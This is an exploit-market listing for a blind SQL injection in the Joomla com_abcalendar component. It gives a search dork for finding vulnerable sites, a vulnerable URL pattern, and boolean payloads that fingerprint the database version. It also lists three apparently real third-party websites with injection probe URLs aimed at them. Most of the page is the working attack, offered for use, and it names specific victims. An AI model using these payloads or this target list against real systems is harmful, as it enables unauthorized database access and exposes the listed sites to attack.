[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_abcalendar Blind Injection Vulnerability

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20894
Category
web applications
Date add
15-06-2013
Platform
php
Joomla Component com_abcalendar Blind Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST 
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Dork           : inurl:"com_abcalendar"
####################################################################
===[ Exploit ]===

Sql Injection:
==============

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3[Blind]

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=1 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and 1=2 >> False

www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=5 >> True
www.site.com/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2063&cid=3 and substring(@@version,1,1)=4 >> False
####################################################################

http://www.puntamika.hr/portal/administrator/components/com_abcalendar/load-calendar.php?view=6&month=1&year=3190&cid=1'

www.christchurchapartments.co.uk/~christap/administrator/components/com_abcalendar/load-calendar.php?view=3&month=7&year=2191&cid=3'

http://www.accommodationlagos.com/~accommod/administrator/components/com_abcalendar/load-calendar.php?view=3&month=8&year=5272&cid=3'

#  0day.today [2024-11-16]  #